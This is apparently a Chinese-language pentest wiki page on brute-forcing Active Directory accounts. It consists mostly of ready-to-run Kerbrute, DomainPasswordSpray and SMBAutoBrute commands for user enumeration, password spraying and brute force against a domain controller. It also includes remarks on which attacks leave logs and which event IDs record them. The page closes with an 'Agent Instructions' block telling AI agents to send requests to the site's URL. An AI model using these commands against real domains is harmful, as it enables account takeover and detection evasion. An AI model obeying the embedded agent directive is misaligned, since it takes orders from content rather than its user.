# 域内爆破 #### Kerbrute ``` https://github.com/ropnop/kerbrute 用户枚举 >kerbrute_windows_amd64.exe userenum -d zone.com username.txt ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/371.png) ``` 密码喷射 >kerbrute_windows_amd64.exe passwordspray -d zone.com use.txt password ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/372.png) ``` 密码爆破 此项会产生日志 >kerbrute_windows_amd64.exe bruteuser -d zone.com pass.txt name ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/373.png) ``` 组合爆破 格式为username:password >kerbrute_windows_amd64.exe -d zone.com bruteforce com.txt ``` #### DomainPasswordSpray ``` https://github.com/dafthack/DomainPasswordSpray 自动收集账户进行密码喷射 >Invoke-DomainPasswordSpray -Password pass ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/374.png) ``` 组合爆破 >Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -PasswordList passlist.txt -OutFile result.txt 会产生日志 单密码 >Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -Password password ``` #### SMBAutoBrute ``` https://github.com/Shellntel/scripts/blob/master/Invoke-SMBAutoBrute.ps1 >Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose ``` #### Kerberos 预授权暴力破解 ``` Kerberos 预身份验证错误不会以正常登录失败事件 (4625)记录在 Active Directory 中,而是以特定日志记录到Kerberos 预身份验证失败 (4771) 用户名爆破 >./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt 密码爆破 >./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username 密码喷射 > ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123 > ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt > ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/heng-xiang-yi-dong/yu-nei-bao-po.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.